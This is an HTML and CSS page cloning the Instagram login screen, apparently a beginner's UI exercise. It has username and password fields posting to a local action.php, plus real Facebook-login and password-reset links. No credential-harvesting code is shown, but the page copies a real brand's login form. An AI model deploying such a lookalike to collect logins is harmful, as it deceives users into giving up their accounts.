<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    
    <title>Document</title>
    <style>
      body {
  background-color: white;
}
.div1 {
  display: inline;
}
#img1 {
  width: 50%;
  height: 90%;
  margin-left: 0px;
  /* margin-top: 20px;
  margin-left: 100px; */
}
.div2 {
  display: inline;
}
#img2 {
  width: 290px;
  display: inline;
  float: right;
  margin-top: 70px;
  margin-right: 15px;
}
.cantainer {
  display: inline;
  float: right;
  width: 320[x];
  padding: auto;
  border: 1px solid rgb(223, 217, 217);
  height: 400px;
  line-height: 2.5;
  margin-top: 60px;
  margin-right: 357px;
  text-align: center;
}
.div3 > form {
  display: inline;
}
#user {
  width: 250px;
  height: 22px;
  border-radius: 2px;
}
#password {
  width: 250px;
  height: 22px;
  border-radius: 2px;
}
#btn {
  width: 259px;
  height: 25px;
  background-color: #007bb8;
  border-radius: #007bb8 5px;
}
#a1 {
  text-decoration: none;
  color: rebeccapurple;
}
#a2 {
  text-decoration: none;
  color: rebeccapurple;
}

    </style>
  </head>
  <body>
    <header>
      
        <div class="div1">
          <img id="img1" src="insta.jpg" alt="" />
        </div>
        <div class="cantainer">
        <div class="div2">
          <img id="img2" src="logo insta.png" alt="" />
        </div>
        <div class="div3">
          <form action="action.php">
            <input id="user"
              type="text,number,email"
              placeholder="Phone number,username,or email "
            />
            <br />
            <input id="password" type="password" placeholder="Password" />
            <br />
            <button id="btn">Log in</button>
          </form>
        </div>
        
        OR
        
        <div class="div4">
          
          <a id="a1"
            href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Den_US%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%2522sfm9rzqfsbeq1trp7mz4m7sf21168x93rn0h9p1aaqu2c3olt8r%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D6995c60b-c46d-4405-b679-ba610471c949%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522sfm9rzqfsbeq1trp7mz4m7sf21168x93rn0h9p1aaqu2c3olt8r%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0"
            >Log in with Facebook</a
          ><br />
          <a  id="a2" href="https://www.instagram.com/accounts/password/reset/"
            >Forgot Password
          </a>
        </div>
      </div>
    </header>
  </body>
</html>
